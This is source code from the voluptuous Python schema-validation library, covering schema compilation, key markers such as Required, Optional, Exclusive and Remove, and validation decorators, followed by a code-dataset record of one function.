return other.schema == self.schema
def __ne__(self, other):
return not (self == other)
    def __str__(self):
        # Render as the raw schema spec for readability.
        return str(self.schema)

    def __repr__(self):
        # Include the extra policy (by name) and required flag for debugging.
        return "<Schema(%s, extra=%s, required=%s) object at 0x%x>" % (
            self.schema, self._extra_to_name.get(self.extra, '??'),
            self.required, id(self))
    def __call__(self, data):
        """Validate data against this schema.

        Returns the (possibly coerced) data; raises
        :class:`~voluptuous.error.MultipleInvalid` on failure so callers can
        treat single and aggregated failures uniformly.
        """
        try:
            return self._compiled([], data)
        except er.MultipleInvalid:
            raise
        except er.Invalid as e:
            # Wrap a lone Invalid so the public contract is always
            # MultipleInvalid.
            raise er.MultipleInvalid([e])
    def _compile(self, schema):
        # Dispatch on the schema node type to the appropriate compiler.
        # Order matters: e.g. Object is a dict subclass and must be tested
        # before the generic Mapping branch.
        if schema is Extra:
            return lambda _, v: v
        if schema is Self:
            # Recursive reference back to this schema's own compiled form.
            return lambda p, v: self._compiled(p, v)
        elif hasattr(schema, "__voluptuous_compile__"):
            # Hook allowing custom types to supply their own compiler.
            return schema.__voluptuous_compile__(self)
        if isinstance(schema, Object):
            return self._compile_object(schema)
        if isinstance(schema, _Mapping):
            return self._compile_dict(schema)
        elif isinstance(schema, list):
            return self._compile_list(schema)
        elif isinstance(schema, tuple):
            return self._compile_tuple(schema)
        elif isinstance(schema, (frozenset, set)):
            return self._compile_set(schema)
        type_ = type(schema)
        if inspect.isclass(schema):
            type_ = schema
        # Plain values, types and callables all compile to scalar checks.
        if type_ in (bool, bytes, int, long, str, unicode, float, complex, object,
                     list, dict, type(None)) or callable(schema):
            return _compile_scalar(schema)
        raise er.SchemaError('unsupported schema data type %r' %
                             type(schema).__name__)
    def _compile_mapping(self, schema, invalid_msg=None):
        """Create validator for given mapping.

        Shared by the dict and object compilers; *invalid_msg* labels
        value errors ('dictionary value' vs 'object value').
        """
        invalid_msg = invalid_msg or 'mapping value'

        # Keys that may be required
        all_required_keys = set(key for key in schema
                                if key is not Extra and
                                ((self.required and not isinstance(key, (Optional, Remove))) or
                                 isinstance(key, Required)))

        # Keys that may have defaults
        all_default_keys = set(key for key in schema
                               if isinstance(key, Required) or
                               isinstance(key, Optional))

        # Pre-compile every schema key/value pair once.
        _compiled_schema = {}
        for skey, svalue in iteritems(schema):
            new_key = self._compile(skey)
            new_value = self._compile(svalue)
            _compiled_schema[skey] = (new_key, new_value)

        candidates = list(_iterate_mapping_candidates(_compiled_schema))

        # After we have the list of candidates in the correct order, we want to apply some optimization so that each
        # key in the data being validated will be matched against the relevant schema keys only.
        # No point in matching against different keys
        additional_candidates = []
        candidates_by_key = {}
        for skey, (ckey, cvalue) in candidates:
            if type(skey) in primitive_types:
                candidates_by_key.setdefault(skey, []).append((skey, (ckey, cvalue)))
            elif isinstance(skey, Marker) and type(skey.schema) in primitive_types:
                candidates_by_key.setdefault(skey.schema, []).append((skey, (ckey, cvalue)))
            else:
                # These are wildcards such as 'int', 'str', 'Remove' and others which should be applied to all keys
                additional_candidates.append((skey, (ckey, cvalue)))

        def validate_mapping(path, iterable, out):
            required_keys = all_required_keys.copy()

            # Build a map of all provided key-value pairs.
            # The type(out) is used to retain ordering in case a ordered
            # map type is provided as input.
            key_value_map = type(out)()
            for key, value in iterable:
                key_value_map[key] = value

            # Insert default values for non-existing keys.
            for key in all_default_keys:
                if not isinstance(key.default, Undefined) and \
                        key.schema not in key_value_map:
                    # A default value has been specified for this missing
                    # key, insert it.
                    key_value_map[key.schema] = key.default()

            error = None
            errors = []
            for key, value in key_value_map.items():
                key_path = path + [key]
                remove_key = False

                # Optimization. Validate against the matching key first, then fallback to the rest
                relevant_candidates = itertools.chain(candidates_by_key.get(key, []), additional_candidates)

                # compare each given key/value against all compiled key/values
                # schema key, (compiled key, compiled value)
                for skey, (ckey, cvalue) in relevant_candidates:
                    try:
                        new_key = ckey(key_path, key)
                    except er.Invalid as e:
                        if len(e.path) > len(key_path):
                            raise
                        if not error or len(e.path) > len(error.path):
                            error = e
                        continue
                    # Backtracking is not performed once a key is selected, so if
                    # the value is invalid we immediately throw an exception.
                    exception_errors = []
                    # check if the key is marked for removal
                    is_remove = new_key is Remove
                    try:
                        cval = cvalue(key_path, value)
                        # include if it's not marked for removal
                        if not is_remove:
                            out[new_key] = cval
                        else:
                            remove_key = True
                            continue
                    except er.MultipleInvalid as e:
                        exception_errors.extend(e.errors)
                    except er.Invalid as e:
                        exception_errors.append(e)

                    if exception_errors:
                        if is_remove or remove_key:
                            continue
                        for err in exception_errors:
                            if len(err.path) <= len(key_path):
                                err.error_type = invalid_msg
                            errors.append(err)
                        # If there is a validation error for a required
                        # key, this means that the key was provided.
                        # Discard the required key so it does not
                        # create an additional, noisy exception.
                        required_keys.discard(skey)
                        break

                    # Key and value okay, mark as found in case it was
                    # a Required() field.
                    required_keys.discard(skey)
                    break
                else:
                    # No schema key matched this data key: apply the
                    # configured extra-keys policy.
                    if remove_key:
                        # remove key
                        continue
                    elif self.extra == ALLOW_EXTRA:
                        out[key] = value
                    elif self.extra != REMOVE_EXTRA:
                        errors.append(er.Invalid('extra keys not allowed', key_path))
                    # else REMOVE_EXTRA: ignore the key so it's removed from output

            # for any required keys left that weren't found and don't have defaults:
            for key in required_keys:
                msg = key.msg if hasattr(key, 'msg') and key.msg else 'required key not provided'
                errors.append(er.RequiredFieldInvalid(msg, path + [key]))
            if errors:
                raise er.MultipleInvalid(errors)

            return out

        return validate_mapping
    def _compile_object(self, schema):
        """Validate an object.

        Has the same behavior as dictionary validator but work with object
        attributes.

        For example:

            >>> class Structure(object):
            ...     def __init__(self, one=None, three=None):
            ...         self.one = one
            ...         self.three = three
            ...
            >>> validate = Schema(Object({'one': 'two', 'three': 'four'}, cls=Structure))
            >>> with raises(er.MultipleInvalid, "not a valid value for object value @ data['one']"):
            ...   validate(Structure(one='three'))
        """
        base_validate = self._compile_mapping(
            schema, invalid_msg='object value')

        def validate_object(path, data):
            # Optional class restriction supplied via Object(..., cls=...).
            if schema.cls is not UNDEFINED and not isinstance(data, schema.cls):
                raise er.ObjectInvalid('expected a {0!r}'.format(schema.cls), path)
            # Treat attribute pairs like dict items; None-valued attributes
            # are considered absent.
            iterable = _iterate_object(data)
            iterable = ifilter(lambda item: item[1] is not None, iterable)
            out = base_validate(path, iterable, {})
            # Rebuild an instance of the same type from validated attrs.
            return type(data)(**out)

        return validate_object
    def _compile_dict(self, schema):
        """Validate a dictionary.

        A dictionary schema can contain a set of values, or at most one
        validator function/type.

        A dictionary schema will only validate a dictionary:

            >>> validate = Schema({})
            >>> with raises(er.MultipleInvalid, 'expected a dictionary'):
            ...   validate([])

        An invalid dictionary value:

            >>> validate = Schema({'one': 'two', 'three': 'four'})
            >>> with raises(er.MultipleInvalid, "not a valid value for dictionary value @ data['one']"):
            ...   validate({'one': 'three'})

        An invalid key:

            >>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['two']"):
            ...   validate({'two': 'three'})

        Validation function, in this case the "int" type:

            >>> validate = Schema({'one': 'two', 'three': 'four', int: str})

        Valid integer input:

            >>> validate({10: 'twenty'})
            {10: 'twenty'}

        By default, a "type" in the schema (in this case "int") will be used
        purely to validate that the corresponding value is of that type. It
        will not Coerce the value:

            >>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['10']"):
            ...   validate({'10': 'twenty'})

        Wrap them in the Coerce() function to achieve this:

            >>> from voluptuous import Coerce
            >>> validate = Schema({'one': 'two', 'three': 'four',
            ...                    Coerce(int): str})
            >>> validate({'10': 'twenty'})
            {10: 'twenty'}

        Custom message for required key

            >>> validate = Schema({Required('one', 'required'): 'two'})
            >>> with raises(er.MultipleInvalid, "required @ data['one']"):
            ...   validate({})

        (This is to avoid unexpected surprises.)

        Multiple errors for nested field in a dict:

            >>> validate = Schema({
            ...     'adict': {
            ...         'strfield': str,
            ...         'intfield': int
            ...     }
            ... })
            >>> try:
            ...     validate({
            ...         'adict': {
            ...             'strfield': 123,
            ...             'intfield': 'one'
            ...         }
            ...     })
            ... except er.MultipleInvalid as e:
            ...     print(sorted(str(i) for i in e.errors))  # doctest: +NORMALIZE_WHITESPACE
            ["expected int for dictionary value @ data['adict']['intfield']",
             "expected str for dictionary value @ data['adict']['strfield']"]
        """
        base_validate = self._compile_mapping(
            schema, invalid_msg='dictionary value')

        # Collect Exclusive/Inclusive markers by their group labels so the
        # group constraints can be checked before ordinary validation.
        groups_of_exclusion = {}
        groups_of_inclusion = {}
        for node in schema:
            if isinstance(node, Exclusive):
                g = groups_of_exclusion.setdefault(node.group_of_exclusion, [])
                g.append(node)
            elif isinstance(node, Inclusive):
                g = groups_of_inclusion.setdefault(node.group_of_inclusion, [])
                g.append(node)

        def validate_dict(path, data):
            if not isinstance(data, dict):
                raise er.DictInvalid('expected a dictionary', path)

            errors = []
            # At most one key per exclusion group may be present.
            for label, group in groups_of_exclusion.items():
                exists = False
                for exclusive in group:
                    if exclusive.schema in data:
                        if exists:
                            msg = exclusive.msg if hasattr(exclusive, 'msg') and exclusive.msg else \
                                "two or more values in the same group of exclusion '%s'" % label
                            next_path = path + [VirtualPathComponent(label)]
                            errors.append(er.ExclusiveInvalid(msg, next_path))
                            break
                        exists = True
            if errors:
                raise er.MultipleInvalid(errors)

            # Inclusion groups must appear all-or-nothing.
            for label, group in groups_of_inclusion.items():
                included = [node.schema in data for node in group]
                if any(included) and not all(included):
                    msg = "some but not all values in the same group of inclusion '%s'" % label
                    for g in group:
                        if hasattr(g, 'msg') and g.msg:
                            msg = g.msg
                            break
                    next_path = path + [VirtualPathComponent(label)]
                    errors.append(er.InclusiveInvalid(msg, next_path))
                    break
            if errors:
                raise er.MultipleInvalid(errors)

            # Preserve the input's mapping type (e.g. OrderedDict).
            out = data.__class__()
            return base_validate(path, iteritems(data), out)

        return validate_dict
    def _compile_sequence(self, schema, seq_type):
        """Validate a sequence type.

        This is a sequence of valid values or validators tried in order.

        >>> validator = Schema(['one', 'two', int])
        >>> validator(['one'])
        ['one']
        >>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
        ...   validator([3.5])
        >>> validator([1])
        [1]
        """
        _compiled = [self._compile(s) for s in schema]
        seq_type_name = seq_type.__name__

        def validate_sequence(path, data):
            if not isinstance(data, seq_type):
                raise er.SequenceTypeInvalid('expected a %s' % seq_type_name, path)

            # Empty seq schema, allow any data.
            if not schema:
                if data:
                    raise er.MultipleInvalid([
                        er.ValueInvalid('not a valid value', [value]) for value in data
                    ])
                return data

            out = []
            invalid = None
            errors = []
            index_path = UNDEFINED
            for i, value in enumerate(data):
                index_path = path + [i]
                invalid = None
                # Each element must satisfy at least one sub-validator.
                for validate in _compiled:
                    try:
                        cval = validate(index_path, value)
                        if cval is not Remove:  # do not include Remove values
                            out.append(cval)
                        break
                    except er.Invalid as e:
                        if len(e.path) > len(index_path):
                            raise
                        invalid = e
                else:
                    # No validator accepted this element; keep its last error.
                    errors.append(invalid)
            if errors:
                raise er.MultipleInvalid(errors)

            # Rebuild the original sequence type (namedtuples use *args).
            if _isnamedtuple(data):
                return type(data)(*out)
            else:
                return type(data)(out)

        return validate_sequence
    def _compile_tuple(self, schema):
        """Validate a tuple.

        A tuple is a sequence of valid values or validators tried in order.

        >>> validator = Schema(('one', 'two', int))
        >>> validator(('one',))
        ('one',)
        >>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
        ...   validator((3.5,))
        >>> validator((1,))
        (1,)
        """
        # Thin wrapper: all the work happens in _compile_sequence.
        return self._compile_sequence(schema, tuple)
    def _compile_list(self, schema):
        """Validate a list.

        A list is a sequence of valid values or validators tried in order.

        >>> validator = Schema(['one', 'two', int])
        >>> validator(['one'])
        ['one']
        >>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
        ...   validator([3.5])
        >>> validator([1])
        [1]
        """
        # Thin wrapper: all the work happens in _compile_sequence.
        return self._compile_sequence(schema, list)
    def _compile_set(self, schema):
        """Validate a set.

        A set is an unordered collection of unique elements.

        >>> validator = Schema({int})
        >>> validator(set([42])) == set([42])
        True
        >>> with raises(er.Invalid, 'expected a set'):
        ...   validator(42)
        >>> with raises(er.MultipleInvalid, 'invalid value in set'):
        ...   validator(set(['a']))
        """
        type_ = type(schema)
        type_name = type_.__name__

        def validate_set(path, data):
            if not isinstance(data, type_):
                raise er.Invalid('expected a %s' % type_name, path)

            # NOTE(review): sub-validators are compiled on every call here
            # (unlike the sequence compiler, which compiles once up front).
            _compiled = [self._compile(s) for s in schema]
            errors = []
            for value in data:
                # Each member must satisfy at least one sub-validator.
                for validate in _compiled:
                    try:
                        validate(path, value)
                        break
                    except er.Invalid:
                        pass
                else:
                    invalid = er.Invalid('invalid value in %s' % type_name, path)
                    errors.append(invalid)

            if errors:
                raise er.MultipleInvalid(errors)

            return data

        return validate_set
    def extend(self, schema, required=None, extra=None):
        """Create a new `Schema` by merging this and the provided `schema`.

        Neither this `Schema` nor the provided `schema` are modified. The
        resulting `Schema` inherits the `required` and `extra` parameters of
        this, unless overridden.

        Both schemas must be dictionary-based.

        :param schema: dictionary to extend this `Schema` with
        :param required: if set, overrides `required` of this `Schema`
        :param extra: if set, overrides `extra` of this `Schema`
        """
        assert type(self.schema) == dict and type(schema) == dict, 'Both schemas must be dictionary-based'

        result = self.schema.copy()

        # returns the key that may have been passed as argument to Marker constructor
        def key_literal(key):
            return (key.schema if isinstance(key, Marker) else key)

        # build a map that takes the key literals to the needed objects
        # literal -> Required|Optional|literal
        result_key_map = dict((key_literal(key), key) for key in result)

        # for each item in the extension schema, replace duplicates
        # or add new keys
        for key, value in iteritems(schema):

            # if the key is already in the dictionary, we need to replace it
            # transform key to literal before checking presence
            if key_literal(key) in result_key_map:

                result_key = result_key_map[key_literal(key)]
                result_value = result[result_key]

                # if both are dictionaries, we need to extend recursively
                # create the new extended sub schema, then remove the old key and add the new one
                if type(result_value) == dict and type(value) == dict:
                    new_value = Schema(result_value).extend(value).schema
                    del result[result_key]
                    result[key] = new_value
                # one or the other or both are not sub-schemas, simple replacement is fine
                # remove old key and add new one
                else:
                    del result[result_key]
                    result[key] = value

            # key is new and can simply be added
            else:
                result[key] = value

        # recompile and send old object
        result_cls = type(self)
        result_required = (required if required is not None else self.required)
        result_extra = (extra if extra is not None else self.extra)
        return result_cls(result, required=result_required, extra=result_extra)
def _compile_scalar(schema):
    """A scalar value.

    The schema can either be a value or a type.

    >>> _compile_scalar(int)([], 1)
    1
    >>> with raises(er.Invalid, 'expected float'):
    ...   _compile_scalar(float)([], '1')

    Callables have
    >>> _compile_scalar(lambda v: float(v))([], '1')
    1.0

    As a convenience, ValueError's are trapped:

    >>> with raises(er.Invalid, 'not a valid value'):
    ...   _compile_scalar(lambda v: float(v))([], 'a')
    """
    # A class schema means "value must be an instance of this type".
    if inspect.isclass(schema):
        def validate_instance(path, data):
            if isinstance(data, schema):
                return data
            else:
                msg = 'expected %s' % schema.__name__
                raise er.TypeInvalid(msg, path)

        return validate_instance

    # A callable schema validates (and may coerce) the value itself.
    if callable(schema):
        def validate_callable(path, data):
            try:
                return schema(data)
            except ValueError as e:
                raise er.ValueInvalid('not a valid value', path)
            except er.Invalid as e:
                # Prefix the path so nested errors point at this location.
                e.prepend(path)
                raise

        return validate_callable

    # Anything else is compared for equality against the data.
    def validate_value(path, data):
        if data != schema:
            raise er.ScalarInvalid('not a valid value', path)
        return data

    return validate_value
def _compile_itemsort():
    """Return the key function used to sort mapping schema candidates."""
    def is_extra(key_):
        return key_ is Extra

    def is_remove(key_):
        return isinstance(key_, Remove)

    def is_marker(key_):
        return isinstance(key_, Marker)

    def is_type(key_):
        return inspect.isclass(key_)

    def is_callable(key_):
        return callable(key_)

    # priority list for map sorting (in order of checking)
    # We want Extra to match last, because it's a catch-all. On the other hand,
    # Remove markers should match first (since invalid values will not
    # raise an Error, instead the validator will check if other schemas match
    # the same value).
    # NOTE: the *list order* decides which predicate wins when several match
    # (classes are also callable, so is_type is checked before is_callable),
    # while the attached number decides the final sort position.
    priority = [(1, is_remove),  # Remove highest priority after values
                (2, is_marker),  # then other Markers
                (4, is_type),  # types/classes lowest before Extra
                (3, is_callable),  # callables after markers
                (5, is_extra)]  # Extra lowest priority

    def item_priority(item_):
        key_ = item_[0]
        for i, check_ in priority:
            if check_(key_):
                return i
        # values have highest priority (sorted first)
        return 0

    return item_priority


# Module-level singleton key function shared by all schema compilations.
_sort_item = _compile_itemsort()
def _iterate_mapping_candidates(schema):
    """Iterate over schema in a meaningful order.

    Yields (schema_key, compiled_pair) items sorted so that concrete values
    match before markers, callables, types and finally Extra.
    """
    # Without this, Extra might appear first in the iterator, and fail to
    # validate a key even though it's a Required that has its own validation,
    # generating a false positive.
    return sorted(iteritems(schema), key=_sort_item)
class Msg(object):
    """Report a user-friendly message if a schema fails to validate.

    >>> validate = Schema(
    ...   Msg(['one', 'two', int],
    ...       'should be one of "one", "two" or an integer'))
    >>> with raises(er.MultipleInvalid, 'should be one of "one", "two" or an integer'):
    ...   validate(['three'])

    Messages are only applied to invalid direct descendants of the schema:

    >>> validate = Schema(Msg([['one', 'two', int]], 'not okay!'))
    >>> with raises(er.MultipleInvalid, 'expected int @ data[0][0]'):
    ...   validate([['three']])

    The type which is thrown can be overridden but needs to be a subclass of Invalid

    >>> with raises(er.SchemaError, 'Msg can only use subclases of Invalid as custom class'):
    ...   validate = Schema(Msg([int], 'should be int', cls=KeyError))

    If you do use a subclass of Invalid, that error will be thrown (wrapped in a MultipleInvalid)

    >>> validate = Schema(Msg([['one', 'two', int]], 'not okay!', cls=er.RangeInvalid))
    >>> try:
    ...  validate(['three'])
    ... except er.MultipleInvalid as e:
    ...   assert isinstance(e.errors[0], er.RangeInvalid)
    """

    def __init__(self, schema, msg, cls=None):
        if cls and not issubclass(cls, er.Invalid):
            raise er.SchemaError("Msg can only use subclases of"
                                 " Invalid as custom class")
        self._schema = schema
        self.schema = Schema(schema)
        self.msg = msg
        self.cls = cls

    def __call__(self, v):
        try:
            return self.schema(v)
        except er.Invalid as e:
            # Only rewrite errors on direct descendants; deeper errors keep
            # their own (more precise) messages.
            if len(e.path) > 1:
                raise e
            else:
                raise (self.cls or er.Invalid)(self.msg)

    def __repr__(self):
        return 'Msg(%s, %s, cls=%s)' % (self._schema, self.msg, self.cls)
class Object(dict):
    """Indicate that we should work with attributes, not keys."""

    def __init__(self, schema, cls=UNDEFINED):
        # cls restricts validation to instances of that class; the default
        # UNDEFINED means any object is acceptable.
        self.cls = cls
        super(Object, self).__init__(schema)
class VirtualPathComponent(str):
    """Path element for synthetic groups (inclusion/exclusion labels).

    Rendered inside angle brackets so error paths read ``data[<group>]``.
    """

    def __str__(self):
        return '<{0}>'.format(self[:])

    # repr matches str so error paths render identically either way.
    __repr__ = __str__
# Markers.py
class Marker(object):
    """Mark nodes for special treatment.

    A Marker wraps a schema node; it hashes and compares equal to its raw
    schema so it can stand in for the plain key inside a schema dict.
    """

    def __init__(self, schema_, msg=None, description=None):
        self.schema = schema_
        # Pre-compiled form used when the marker itself validates a value.
        self._schema = Schema(schema_)
        self.msg = msg
        self.description = description

    def __call__(self, v):
        try:
            return self._schema(v)
        except er.Invalid as e:
            # Only replace the message for direct failures; deeper errors
            # keep their own more specific messages.
            if not self.msg or len(e.path) > 1:
                raise
            raise er.Invalid(self.msg)

    def __str__(self):
        return str(self.schema)

    def __repr__(self):
        return repr(self.schema)

    def __lt__(self, other):
        if isinstance(other, Marker):
            return self.schema < other.schema
        return self.schema < other

    def __hash__(self):
        # Hash/eq delegate to the wrapped schema so markers can be looked
        # up by the raw key.
        return hash(self.schema)

    def __eq__(self, other):
        return self.schema == other

    def __ne__(self, other):
        return not(self.schema == other)
class Optional(Marker):
    """Mark a node in the schema as optional, and optionally provide a default

    >>> schema = Schema({Optional('key'): str})
    >>> schema({})
    {}
    >>> schema = Schema({Optional('key', default='value'): str})
    >>> schema({})
    {'key': 'value'}
    >>> schema = Schema({Optional('key', default=list): list})
    >>> schema({})
    {'key': []}

    If 'required' flag is set for an entire schema, optional keys aren't required

    >>> schema = Schema({
    ...    Optional('key'): str,
    ...    'key2': str
    ... }, required=True)
    >>> schema({'key2':'value'})
    {'key2': 'value'}
    """

    def __init__(self, schema, msg=None, default=UNDEFINED, description=None):
        super(Optional, self).__init__(schema, msg=msg,
                                       description=description)
        # Normalise the default spec into a zero-argument factory
        # (or leave it as UNDEFINED when no default was given).
        self.default = default_factory(default)
class Exclusive(Optional):
    """Mark a node in the schema as exclusive.

    Exclusive keys inherited from Optional:

    >>> schema = Schema({Exclusive('alpha', 'angles'): int, Exclusive('beta', 'angles'): int})
    >>> schema({'alpha': 30})
    {'alpha': 30}

    Keys inside a same group of exclusion cannot be together, it only makes sense for dictionaries:

    >>> with raises(er.MultipleInvalid, "two or more values in the same group of exclusion 'angles' @ data[<angles>]"):
    ...   schema({'alpha': 30, 'beta': 45})

    For example, API can provides multiple types of authentication, but only one works in the same time:

    >>> msg = 'Please, use only one type of authentication at the same time.'
    >>> schema = Schema({
    ... Exclusive('classic', 'auth', msg=msg):{
    ...     Required('email'): basestring,
    ...     Required('password'): basestring
    ...     },
    ... Exclusive('internal', 'auth', msg=msg):{
    ...     Required('secret_key'): basestring
    ...     },
    ... Exclusive('social', 'auth', msg=msg):{
    ...     Required('social_network'): basestring,
    ...     Required('token'): basestring
    ...     }
    ... })

    >>> with raises(er.MultipleInvalid, "Please, use only one type of authentication at the same time. @ data[<auth>]"):
    ...     schema({'classic': {'email': 'foo@example.com', 'password': 'bar'},
    ...             'social': {'social_network': 'barfoo', 'token': 'tEMp'}})
    """

    def __init__(self, schema, group_of_exclusion, msg=None, description=None):
        super(Exclusive, self).__init__(schema, msg=msg,
                                        description=description)
        # The group label; checked by the dict compiler.
        self.group_of_exclusion = group_of_exclusion
class Inclusive(Optional):
    """Mark a node in the schema as inclusive.

    Inclusive keys inherited from Optional:

    >>> schema = Schema({
    ...     Inclusive('filename', 'file'): str,
    ...     Inclusive('mimetype', 'file'): str
    ... })
    >>> data = {'filename': 'dog.jpg', 'mimetype': 'image/jpeg'}
    >>> data == schema(data)
    True

    Keys inside a same group of inclusive must exist together, it only makes sense for dictionaries:

    >>> with raises(er.MultipleInvalid, "some but not all values in the same group of inclusion 'file' @ data[<file>]"):
    ...     schema({'filename': 'dog.jpg'})

    If none of the keys in the group are present, it is accepted:

    >>> schema({})
    {}

    For example, API can return 'height' and 'width' together, but not separately.

    >>> msg = "Height and width must exist together"
    >>> schema = Schema({
    ...     Inclusive('height', 'size', msg=msg): int,
    ...     Inclusive('width', 'size', msg=msg): int
    ... })

    >>> with raises(er.MultipleInvalid, msg + " @ data[<size>]"):
    ...     schema({'height': 100})

    >>> with raises(er.MultipleInvalid, msg + " @ data[<size>]"):
    ...     schema({'width': 100})

    >>> data = {'height': 100, 'width': 100}
    >>> data == schema(data)
    True
    """

    def __init__(self, schema, group_of_inclusion,
                 msg=None, description=None, default=UNDEFINED):
        super(Inclusive, self).__init__(schema, msg=msg,
                                        default=default,
                                        description=description)
        # The group label; checked all-or-nothing by the dict compiler.
        self.group_of_inclusion = group_of_inclusion
class Required(Marker):
    """Mark a node in the schema as being required, and optionally provide a default value.

    >>> schema = Schema({Required('key'): str})
    >>> with raises(er.MultipleInvalid, "required key not provided @ data['key']"):
    ...     schema({})

    >>> schema = Schema({Required('key', default='value'): str})
    >>> schema({})
    {'key': 'value'}

    >>> schema = Schema({Required('key', default=list): list})
    >>> schema({})
    {'key': []}
    """

    def __init__(self, schema, msg=None, default=UNDEFINED, description=None):
        super(Required, self).__init__(schema, msg=msg,
                                       description=description)
        # Normalize ``default`` to a zero-argument callable (or the
        # UNDEFINED sentinel) so Schema can lazily produce a fresh value
        # for every validation run (important for mutable defaults).
        self.default = default_factory(default)
class Remove(Marker):
    """Mark a node in the schema to be removed and excluded from the validated
    output. Keys that fail validation will not raise ``Invalid``. Instead, these
    keys will be treated as extras.

    >>> schema = Schema({str: int, Remove(int): str})
    >>> with raises(er.MultipleInvalid, "extra keys not allowed @ data[1]"):
    ...     schema({'keep': 1, 1: 1.0})
    >>> schema({1: 'red', 'red': 1, 2: 'green'})
    {'red': 1}

    >>> schema = Schema([int, Remove(float), Extra])
    >>> schema([1, 2, 3, 4.0, 5, 6.0, '7'])
    [1, 2, 3, 5, '7']
    """

    def __call__(self, v):
        # Validate as usual, but return the class itself as a sentinel;
        # the mapping/sequence compilers test for this sentinel and drop
        # the matching item from the output.
        super(Remove, self).__call__(v)
        return self.__class__

    def __repr__(self):
        return "Remove(%r)" % (self.schema,)

    def __hash__(self):
        # Markers normally hash by their wrapped schema; Remove instances
        # use object identity instead, so distinct Remove markers never
        # collide as dict keys.
        return object.__hash__(self)
def message(default=None, cls=None):
    """Convenience decorator to allow functions to provide a message.

    Set a default message:

    >>> @message('not an integer')
    ... def isint(v):
    ...     return int(v)

    >>> validate = Schema(isint())
    >>> with raises(er.MultipleInvalid, 'not an integer'):
    ...     validate('a')

    The message can be overridden on a per validator basis:

    >>> validate = Schema(isint('bad'))
    >>> with raises(er.MultipleInvalid, 'bad'):
    ...     validate('a')

    The class thrown too:

    >>> class IntegerInvalid(er.Invalid): pass
    >>> validate = Schema(isint('bad', clsoverride=IntegerInvalid))
    >>> try:
    ...     validate('a')
    ... except er.MultipleInvalid as e:
    ...     assert isinstance(e.errors[0], IntegerInvalid)

    :param default: message used when the per-validator ``msg`` is absent.
    :param cls: Invalid subclass to raise instead of ``er.ValueInvalid``.
    :raises er.SchemaError: if ``cls`` is not an Invalid subclass.
    """
    if cls and not issubclass(cls, er.Invalid):
        # Fixed typo in the error text ("subclases" -> "subclasses").
        raise er.SchemaError("message can only use subclasses of Invalid as custom class")

    def decorator(f):
        @wraps(f)
        def check(msg=None, clsoverride=None):
            @wraps(f)
            def wrapper(*args, **kwargs):
                try:
                    return f(*args, **kwargs)
                except ValueError:
                    # Translate plain ValueErrors into the configured
                    # Invalid subclass, preferring the most specific of
                    # per-call msg, decorator default, and a generic text.
                    raise (clsoverride or cls or er.ValueInvalid)(
                        msg or default or 'invalid value')
            return wrapper
        return check
    return decorator
def _args_to_dict(func, args):
"""Returns argument names as values as key-value pairs."""
if sys.version_info >= (3, 0):
arg_count = func.__code__.co_argcount
arg_names = func.__code__.co_varnames[:arg_count]
else:
arg_count = func.func_code.co_argcount
arg_names = func.func_code.co_varnames[:arg_count]
arg_value_list = list(args)
arguments = dict((arg_name, arg_value_list[i])
for i, arg_name in enumerate(arg_names)
if i < len(arg_value_list))
return arguments
def _merge_args_with_kwargs(args_dict, kwargs_dict):
"""Merge args with kwargs."""
ret = args_dict.copy()
ret.update(kwargs_dict)
return ret
def validate(*a, **kw):
    """Decorator for validating arguments of a function against a given schema.

    Set restrictions for arguments:

    >>> @validate(arg1=int, arg2=int)
    ... def foo(arg1, arg2):
    ...   return arg1 * arg2

    Set restriction for returned value:

    >>> @validate(arg=int, __return__=int)
    ... def bar(arg1):
    ...   return arg1 * 2
    """
    RETURNS_KEY = '__return__'

    def validate_schema_decorator(func):
        returns_defined = False
        returns = None

        # Positional schemas are matched to the decorated function's
        # parameter names, then merged with keyword schemas.
        schema_args_dict = _args_to_dict(func, a)
        schema_arguments = _merge_args_with_kwargs(schema_args_dict, kw)

        if RETURNS_KEY in schema_arguments:
            # The special '__return__' key validates the return value and
            # must not leak into the argument schema.
            returns_defined = True
            returns = schema_arguments[RETURNS_KEY]
            del schema_arguments[RETURNS_KEY]

        # ALLOW_EXTRA lets un-annotated arguments pass through untouched;
        # with no argument schemas at all, validation is the identity.
        input_schema = (Schema(schema_arguments, extra=ALLOW_EXTRA)
                        if len(schema_arguments) != 0 else lambda x: x)
        output_schema = Schema(returns) if returns_defined else lambda x: x

        @wraps(func)
        def func_wrapper(*args, **kwargs):
            args_dict = _args_to_dict(func, args)
            arguments = _merge_args_with_kwargs(args_dict, kwargs)
            validated_arguments = input_schema(arguments)
            # All arguments are forwarded as keywords after validation.
            output = func(**validated_arguments)
            return output_schema(output)
        return func_wrapper
    return validate_schema_decorator
|
alecthomas/voluptuous | voluptuous/schema_builder.py | message | python | def message(default=None, cls=None):
if cls and not issubclass(cls, er.Invalid):
raise er.SchemaError("message can only use subclases of Invalid as custom class")
def decorator(f):
@wraps(f)
def check(msg=None, clsoverride=None):
@wraps(f)
def wrapper(*args, **kwargs):
try:
return f(*args, **kwargs)
except ValueError:
raise (clsoverride or cls or er.ValueInvalid)(msg or default or 'invalid value')
return wrapper
return check
return decorator | Convenience decorator to allow functions to provide a message.
Set a default message:
>>> @message('not an integer')
... def isint(v):
... return int(v)
>>> validate = Schema(isint())
>>> with raises(er.MultipleInvalid, 'not an integer'):
... validate('a')
The message can be overridden on a per validator basis:
>>> validate = Schema(isint('bad'))
>>> with raises(er.MultipleInvalid, 'bad'):
... validate('a')
The class thrown too:
>>> class IntegerInvalid(er.Invalid): pass
>>> validate = Schema(isint('bad', clsoverride=IntegerInvalid))
>>> try:
... validate('a')
... except er.MultipleInvalid as e:
... assert isinstance(e.errors[0], IntegerInvalid) | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/schema_builder.py#L1185-L1230 | null | import collections
import inspect
import re
from functools import wraps
import sys
from contextlib import contextmanager
import itertools
from voluptuous import error as er
if sys.version_info >= (3,):
long = int
unicode = str
basestring = str
ifilter = filter
def iteritems(d):
return d.items()
else:
from itertools import ifilter
def iteritems(d):
return d.iteritems()
if sys.version_info >= (3, 3):
_Mapping = collections.abc.Mapping
else:
_Mapping = collections.Mapping
"""Schema validation for Python data structures.
Given eg. a nested data structure like this:
{
'exclude': ['Users', 'Uptime'],
'include': [],
'set': {
'snmp_community': 'public',
